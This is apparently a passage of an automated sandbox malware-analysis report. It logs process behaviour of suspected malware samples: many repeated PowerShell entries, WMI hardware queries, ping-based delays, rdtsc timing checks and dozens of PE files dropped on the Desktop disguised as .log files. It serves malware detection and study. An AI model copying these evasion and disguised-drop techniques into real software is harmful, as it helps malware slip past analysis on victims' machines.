                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\RuntimeDll\cef_process.exeMemory allocated: 17D0000 memory reserve | memory write watchJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeMemory allocated: 1B230000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeMemory allocated: 1550000 memory reserve | memory write watch
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeMemory allocated: 1B090000 memory reserve | memory write watch
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAAC7436FA rdtsc 8_2_00007FFAAC7436FA
                          Source: C:\RuntimeDll\cef_process.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3282Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3614Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2881
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3610
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3129
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\zLeRKKNH.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\jWRUMqoc.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\iesEpfvs.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\YztwqAnw.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\CtGsekUC.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\owqLTDnh.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\ORagGYiO.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\ykSQugis.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\MOnylpdT.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\cmPeMAqD.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\rAZKvkEJ.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\WkOFzhSS.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\zPzZvHLt.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\uqHSBmkN.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\lYDDhZsX.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\FelIlyfv.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\iqbcNzlc.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\PqvOIQVP.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\wjWAnjWL.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\YmBoVQXN.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\WtmFjUlP.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\zlIjJSaG.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\UdNNkMkD.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\KMBPPFZY.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\GWKYIJYf.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZVuWGvdL.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\DJEawqoG.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\vZJioLKA.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\tFkkvTtJ.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\CfUiBMYm.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\Yimecftu.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZfOmxfIp.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\hiNMadse.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\jJYMqGYt.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\pPutoWtQ.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\UicXeyNX.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\QEeosldM.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\jBpuMXxn.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\DhKAQyQA.logJump to dropped file
